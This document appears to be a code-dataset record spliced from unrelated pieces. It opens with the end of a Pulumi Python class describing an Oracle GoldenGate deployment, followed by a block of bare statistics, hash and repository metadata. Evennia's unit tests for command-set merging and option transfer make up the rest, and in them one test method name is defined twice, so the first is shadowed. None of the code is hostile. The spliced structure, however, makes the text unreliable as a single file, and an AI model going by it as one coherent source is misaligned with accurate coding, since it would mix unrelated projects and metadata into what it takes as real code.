return pulumi.get(self, "nsg_ids")
@property
@pulumi.getter(name="oggData")
def ogg_data(self) -> pulumi.Output['outputs.DeploymentOggData']:
"""
(Updatable) Deployment Data for creating an OggDeployment
"""
return pulumi.get(self, "ogg_data")
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> pulumi.Output[str]:
"""
The private IP address in the customer's VCN representing the access point for the associated endpoint service in the GoldenGate service VCN.
"""
return pulumi.get(self, "private_ip_address")
@property
@pulumi.getter(name="publicIpAddress")
def public_ip_address(self) -> pulumi.Output[str]:
"""
The public IP address representing the access point for the Deployment.
"""
return pulumi.get(self, "public_ip_address")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
Possible lifecycle states.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
"""
return pulumi.get(self, "subnet_id")
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
The system tags associated with this resource, if any. The system tags are set by Oracle Cloud Infrastructure services. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{orcl-cloud: {free-tier-retain: true}}`
"""
return pulumi.get(self, "system_tags")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The time the resource was created. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> pulumi.Output[str]:
"""
The time the resource was last updated. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
"""
return pulumi.get(self, "time_updated")
| 49.811659
| 400
| 0.666547
| 6,825
| 55,540
| 5.211868
| 0.044689
| 0.084113
| 0.063366
| 0.052571
| 0.930027
| 0.90616
| 0.891288
| 0.870175
| 0.854432
| 0.819966
| 0
| 0.004642
| 0.220346
| 55,540
| 1,114
| 401
| 49.856373
| 0.816821
| 0.353529
| 0
| 0.692996
| 1
| 0
| 0.11585
| 0.014395
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166915
| false
| 0.00149
| 0.010432
| 0
| 0.280179
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7698aba7811d59ab3c1731ddc2840d6eaae83577
| 45,237
|
py
|
Python
|
evennia/commands/tests.py
|
davidrideout/evennia
|
879eea55acdf4fe5cdc96ba8fd0ab5ccca4ae84b
|
[
"BSD-3-Clause"
] | null | null | null |
evennia/commands/tests.py
|
davidrideout/evennia
|
879eea55acdf4fe5cdc96ba8fd0ab5ccca4ae84b
|
[
"BSD-3-Clause"
] | null | null | null |
evennia/commands/tests.py
|
davidrideout/evennia
|
879eea55acdf4fe5cdc96ba8fd0ab5ccca4ae84b
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Unit testing for the Command system itself.
"""
from django.test import override_settings
from evennia.utils.test_resources import BaseEvenniaTest, TestCase
from evennia.commands.cmdset import CmdSet
from evennia.commands.command import Command
from evennia.commands import cmdparser
# Testing-command sets
class _CmdA(Command):
key = "A"
def __init__(self, cmdset, *args, **kwargs):
super().__init__(*args, **kwargs)
self.from_cmdset = cmdset
class _CmdB(Command):
key = "B"
def __init__(self, cmdset, *args, **kwargs):
super().__init__(*args, **kwargs)
self.from_cmdset = cmdset
class _CmdC(Command):
key = "C"
def __init__(self, cmdset, *args, **kwargs):
super().__init__(*args, **kwargs)
self.from_cmdset = cmdset
class _CmdD(Command):
key = "D"
def __init__(self, cmdset, *args, **kwargs):
super().__init__(*args, **kwargs)
self.from_cmdset = cmdset
class _CmdSetA(CmdSet):
key = "A"
def at_cmdset_creation(self):
self.add(_CmdA("A"))
self.add(_CmdB("A"))
self.add(_CmdC("A"))
self.add(_CmdD("A"))
class _CmdSetB(CmdSet):
key = "B"
def at_cmdset_creation(self):
self.add(_CmdA("B"))
self.add(_CmdB("B"))
self.add(_CmdC("B"))
class _CmdSetC(CmdSet):
key = "C"
def at_cmdset_creation(self):
self.add(_CmdA("C"))
self.add(_CmdB("C"))
class _CmdSetD(CmdSet):
key = "D"
def at_cmdset_creation(self):
self.add(_CmdA("D"))
self.add(_CmdB("D"))
self.add(_CmdC("D"))
self.add(_CmdD("D"))
# testing Command Sets
class TestCmdSetMergers(TestCase):
"Test merging of cmdsets"
def setUp(self):
super().setUp()
self.cmdset_a = _CmdSetA()
self.cmdset_b = _CmdSetB()
self.cmdset_c = _CmdSetC()
self.cmdset_d = _CmdSetD()
def test_union(self):
a, c = self.cmdset_a, self.cmdset_c
cmdset_f = a + c # same-prio
self.assertEqual(len(cmdset_f.commands), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 2)
cmdset_f = c + a # same-prio, inverse order
self.assertEqual(len(cmdset_f.commands), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
a.priority = 1
cmdset_f = a + c # high prio A
self.assertEqual(len(cmdset_f.commands), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
def test_intersect(self):
a, c = self.cmdset_a, self.cmdset_c
a.mergetype = "Intersect"
cmdset_f = a + c # same-prio - c's Union kicks in
self.assertEqual(len(cmdset_f.commands), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 2)
cmdset_f = c + a # same-prio - a's Intersect kicks in
self.assertEqual(len(cmdset_f.commands), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
a.priority = 1
cmdset_f = a + c # high prio A, intersect kicks in
self.assertEqual(len(cmdset_f.commands), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
def test_replace(self):
a, c = self.cmdset_a, self.cmdset_c
c.mergetype = "Replace"
cmdset_f = a + c # same-prio. C's Replace kicks in
self.assertEqual(len(cmdset_f.commands), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 0)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 2)
cmdset_f = c + a # same-prio. A's Union kicks in
self.assertEqual(len(cmdset_f.commands), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
c.priority = 1
cmdset_f = c + a # c higher prio. C's Replace kicks in
self.assertEqual(len(cmdset_f.commands), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 0)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 2)
def test_remove(self):
a, c = self.cmdset_a, self.cmdset_c
c.mergetype = "Remove"
cmdset_f = a + c # same-prio. C's Remove kicks in
self.assertEqual(len(cmdset_f.commands), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
cmdset_f = c + a # same-prio. A's Union kicks in
self.assertEqual(len(cmdset_f.commands), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
c.priority = 1
cmdset_f = c + a # c higher prio. C's Remove kicks in
self.assertEqual(len(cmdset_f.commands), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
def test_order(self):
"Merge in reverse- and forward orders, same priorities"
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
cmdset_f = d + c + b + a # merge in reverse order of priority
self.assertEqual(cmdset_f.priority, 0)
self.assertEqual(cmdset_f.mergetype, "Union")
self.assertEqual(len(cmdset_f.commands), 4)
self.assertTrue(all(True for cmd in cmdset_f.commands if cmd.from_cmdset == "A"))
cmdset_f = a + b + c + d # merge in order of priority
self.assertEqual(cmdset_f.priority, 0)
self.assertEqual(cmdset_f.mergetype, "Union")
self.assertEqual(len(cmdset_f.commands), 4) # duplicates setting from A transfers
self.assertTrue(all(True for cmd in cmdset_f.commands if cmd.from_cmdset == "D"))
def test_priority_order(self):
"Merge in reverse- and forward order with well-defined prioritities"
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
cmdset_f = d + c + b + a # merge in reverse order of priority
self.assertEqual(cmdset_f.priority, 2)
self.assertEqual(cmdset_f.mergetype, "Union")
self.assertEqual(len(cmdset_f.commands), 4)
self.assertTrue(all(True for cmd in cmdset_f.commands if cmd.from_cmdset == "A"))
cmdset_f = a + b + c + d # merge in order of priority
self.assertEqual(cmdset_f.priority, 2)
self.assertEqual(cmdset_f.mergetype, "Union")
self.assertEqual(len(cmdset_f.commands), 4)
self.assertTrue(all(True for cmd in cmdset_f.commands if cmd.from_cmdset == "A"))
class TestOptionTransferTrue(TestCase):
"""
Test cmdset-merge transfer of the cmdset-special options
(no_exits/channels/objs/duplicates etc)
cmdset A has all True options
"""
def setUp(self):
super().setUp()
self.cmdset_a = _CmdSetA()
self.cmdset_b = _CmdSetB()
self.cmdset_c = _CmdSetC()
self.cmdset_d = _CmdSetD()
self.cmdset_a.priority = 0
self.cmdset_b.priority = 0
self.cmdset_c.priority = 0
self.cmdset_d.priority = 0
self.cmdset_a.no_exits = True
self.cmdset_a.no_objs = True
self.cmdset_a.no_channels = True
self.cmdset_a.duplicates = True
def test_option_transfer__reverse_sameprio_passthrough(self):
"""
A has all True options, merges last (normal reverse merge), same prio.
The options should pass through to F since none of the other cmdsets
care to change the setting from their default None.
Since A.duplicates = True, the final result is an union of duplicate
pairs (8 commands total).
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
cmdset_f = d + c + b + a # reverse, same-prio
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 8)
def test_option_transfer__forward_sameprio_passthrough(self):
"""
A has all True options, merges first (forward merge), same prio. This
should pass those options through since the other all have options set
to None. The exception is `duplicates` since that is determined by
the two last mergers in the chain both being True.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
cmdset_f = a + b + c + d # forward, same-prio
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_highprio_passthrough(self):
"""
A has all True options, merges last (normal reverse merge) with the
highest prio. This should also pass through.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
cmdset_f = d + c + b + a # reverse, A top priority
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_highprio_passthrough(self):
"""
A has all True options, merges first (forward merge). This is a bit
synthetic since it will never happen in practice, but logic should
still make it pass through.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
cmdset_f = a + b + c + d # forward, A top priority. This never happens in practice.
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_lowprio_passthrough(self):
"""
A has all True options, merges last (normal reverse merge) with the lowest
prio. This never happens (it would always merge first) but logic should hold
and pass through since the other cmdsets have None.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
cmdset_f = d + c + b + a # reverse, A low prio. This never happens in practice.
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_lowprio_passthrough(self):
"""
A has all True options, merges first (forward merge) with lowest prio. This
is the normal behavior for a low-prio cmdset. Passthrough should happen.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
cmdset_f = a + b + c + d # forward, A low prio
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_highprio_block_passthrough(self):
"""
A has all True options, other cmdsets has False. A merges last with high
prio. A should retain its option values and override the others
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
c.no_exits = False
b.no_objs = False
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = d + c + b + a # reverse, high prio
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_highprio_block_passthrough(self):
"""
A has all True options, other cmdsets has False. A merges last with high
prio. This situation should never happen, but logic should hold - the highest
prio's options should survive the merge process.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
c.no_exits = False
b.no_channels = False
b.no_objs = False
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = a + b + c + d # forward, high prio, never happens
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_lowprio_block(self):
"""
A has all True options, other cmdsets has False. A merges last with low
prio. This should result in its values being blocked and come out False.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
c.no_exits = False
c.no_channels = False
b.no_objs = False
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = a + b + c + d # forward, A low prio
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_lowprio_block_partial(self):
"""
A has all True options, other cmdsets has False excet C which has a None
for `no_channels`. A merges last with low
prio. This should result in its values being blocked and come out False
except for no_channels which passes through.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
c.no_exits = False
c.no_channels = None # passthrough
b.no_objs = False
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = a + b + c + d # forward, A low prio
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_highprio_sameprio_order_last(self):
"""
A has all True options and highest prio, D has False and lowest prio,
others are passthrough. B has the same prio as A, with passthrough.
Since A is merged last, this should give prio to A's options
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 2
c.priority = 0
d.priority = -1
d.no_channels = False
d.no_exits = False
d.no_objs = None
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = d + c + b + a # reverse, A same prio, merged after b
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 8)
def test_option_transfer__reverse_highprio_sameprio_order_first(self):
"""
A has all True options and highest prio, D has False and lowest prio,
others are passthrough. B has the same prio as A, with passthrough.
While B, with None-values, is merged after A, A's options should have
replaced those of D at that point, and since B has passthrough the
final result should contain A's True options.
Note that despite A having duplicates=True, there is no duplication in
the DB + A merger since they have different priorities.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 2
c.priority = 0
d.priority = -1
d.no_channels = False
d.no_exits = False
d.no_objs = False
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = d + c + a + b # reverse, A same prio, merged before b
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_lowprio_block(self):
"""
A has all True options, other cmdsets has False. A merges last with low
prio. This usually doesn't happen- it should merge last. But logic should
hold and the low-prio cmdset's values should be blocked and come out False.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
c.no_exits = False
d.no_channels = False
b.no_objs = False
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = d + c + b + a # reverse, A low prio, never happens
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
class TestOptionTransferFalse(TestCase):
"""
Test cmdset-merge transfer of the cmdset-special options
(no_exits/channels/objs/duplicates etc)
cmdset A has all False options
"""
def setUp(self):
super().setUp()
self.cmdset_a = _CmdSetA()
self.cmdset_b = _CmdSetB()
self.cmdset_c = _CmdSetC()
self.cmdset_d = _CmdSetD()
self.cmdset_a.priority = 0
self.cmdset_b.priority = 0
self.cmdset_c.priority = 0
self.cmdset_d.priority = 0
self.cmdset_a.no_exits = False
self.cmdset_a.no_objs = False
self.cmdset_a.no_channels = False
self.cmdset_a.duplicates = False
def test_option_transfer__reverse_sameprio_passthrough(self):
"""
A has all False options, merges last (normal reverse merge), same prio.
The options should pass through to F since none of the other cmdsets
care to change the setting from their default None.
Since A has duplicates=False, the result is a unique union of 4 cmds.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
cmdset_f = d + c + b + a # reverse, same-prio
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_sameprio_passthrough(self):
"""
A has all False options, merges first (forward merge), same prio. This
should pass those options through since the other all have options set
to None. The exception is `duplicates` since that is determined by
the two last mergers in the chain both being .
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
cmdset_f = a + b + c + d # forward, same-prio
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_highprio_passthrough(self):
"""
A has all False options, merges last (normal reverse merge) with the
highest prio. This should also pass through.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
cmdset_f = d + c + b + a # reverse, A top priority
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_highprio_passthrough(self):
"""
A has all False options, merges first (forward merge). This is a bit
synthetic since it will never happen in practice, but logic should
still make it pass through.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
cmdset_f = a + b + c + d # forward, A top priority. This never happens in practice.
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_lowprio_passthrough(self):
"""
A has all False options, merges last (normal reverse merge) with the lowest
prio. This never happens (it would always merge first) but logic should hold
and pass through since the other cmdsets have None.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
cmdset_f = d + c + b + a # reverse, A low prio. This never happens in practice.
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_lowprio_passthrough(self):
"""
A has all False options, merges first (forward merge) with lowest prio. This
is the normal behavior for a low-prio cmdset. Passthrough should happen.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
cmdset_f = a + b + c + d # forward, A low prio
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_highprio_block_passthrough(self):
"""
A has all False options, other cmdsets has True. A merges last with high
prio. A should retain its option values and override the others
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
c.no_exits = True
b.no_objs = True
d.duplicates = True
# higher-prio sets will change the option up the chain
cmdset_f = d + c + b + a # reverse, high prio
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_highprio_block_passthrough(self):
"""
A has all False options, other cmdsets has True. A merges last with high
prio. This situation should never happen, but logic should hold - the highest
prio's options should survive the merge process.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
c.no_exits = True
b.no_channels = True
b.no_objs = True
d.duplicates = True
# higher-prio sets will change the option up the chain
cmdset_f = a + b + c + d # forward, high prio, never happens
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_lowprio_block(self):
"""
A has all False options, other cmdsets has True. A merges last with low
prio. This should result in its values being blocked and come out False.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
c.no_exits = True
c.no_channels = True
b.no_objs = True
d.duplicates = True
# higher-prio sets will change the option up the chain
cmdset_f = a + b + c + d # forward, A low prio
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_lowprio_block_partial(self):
"""
A has all False options, other cmdsets has True excet C which has a None
for `no_channels`. A merges last with low
prio. This should result in its values being blocked and come out True
except for no_channels which passes through.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
c.no_exits = True
c.no_channels = None # passthrough
b.no_objs = True
d.duplicates = True
# higher-prio sets will change the option up the chain
cmdset_f = a + b + c + d # forward, A low prio
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_sameprio_order_last(self):
"""
A has all False options and highest prio, D has True and lowest prio,
others are passthrough. B has the same prio as A, with passthrough.
Since A is merged last, this should give prio to A's False options
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 2
c.priority = 0
d.priority = -1
d.no_channels = True
d.no_exits = True
d.no_objs = True
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = d + c + b + a # reverse, A high prio, merged after b
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_sameprio_order_first(self):
"""
A has all False options and highest prio, D has True and lowest prio,
others are passthrough. B has the same prio as A, with passthrough.
While B, with None-values, is merged after A, A's options should have
replaced those of D at that point, and since B has passthrough the
final result should contain A's False options.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 2
c.priority = 0
d.priority = -1
d.no_channels = True
d.no_exits = True
d.no_objs = True
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = d + c + a + b # reverse, A high prio, merged before b
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_lowprio_block(self):
"""
A has all False options, other cmdsets has True. A merges last with low
prio. This usually doesn't happen- it should merge last. But logic should
hold and the low-prio cmdset's values should be blocked and come out True.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
c.no_exits = True
d.no_channels = True
b.no_objs = True
d.duplicates = True
# higher-prio sets will change the option up the chain
cmdset_f = d + c + b + a # reverse, A low prio, never happens
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
class TestDuplicateBehavior(TestCase):
"""
Test behavior of .duplicate option, which is a bit special in that it
doesn't propagate.
`A.duplicates=True` for all tests.
"""
def setUp(self):
super().setUp()
self.cmdset_a = _CmdSetA()
self.cmdset_b = _CmdSetB()
self.cmdset_c = _CmdSetC()
self.cmdset_d = _CmdSetD()
self.cmdset_a.priority = 0
self.cmdset_b.priority = 0
self.cmdset_c.priority = 0
self.cmdset_d.priority = 0
self.cmdset_a.duplicates = True
def test_reverse_sameprio_duplicate(self):
"""
Test of `duplicates` transfer which does not propagate. Only
A has duplicates=True.
D + B = DB (no duplication, DB.duplication=None)
DB + C = DBC (no duplication, DBC.duplication=None)
DBC + A = final (duplication, final.duplication=None)
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
cmdset_f = d + b + c + a # two last mergers duplicates=True
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 8)
def test_reverse_sameprio_duplicate(self):
"""
Test of `duplicates` transfer, which does not propagate.
C.duplication=True
D + B = DB (no duplication, DB.duplication=None)
DB + C = DBC (duplication, DBC.duplication=None)
DBC + A = final (duplication, final.duplication=None)
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
c.duplicates = True
cmdset_f = d + b + c + a # two last mergers duplicates=True
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 10)
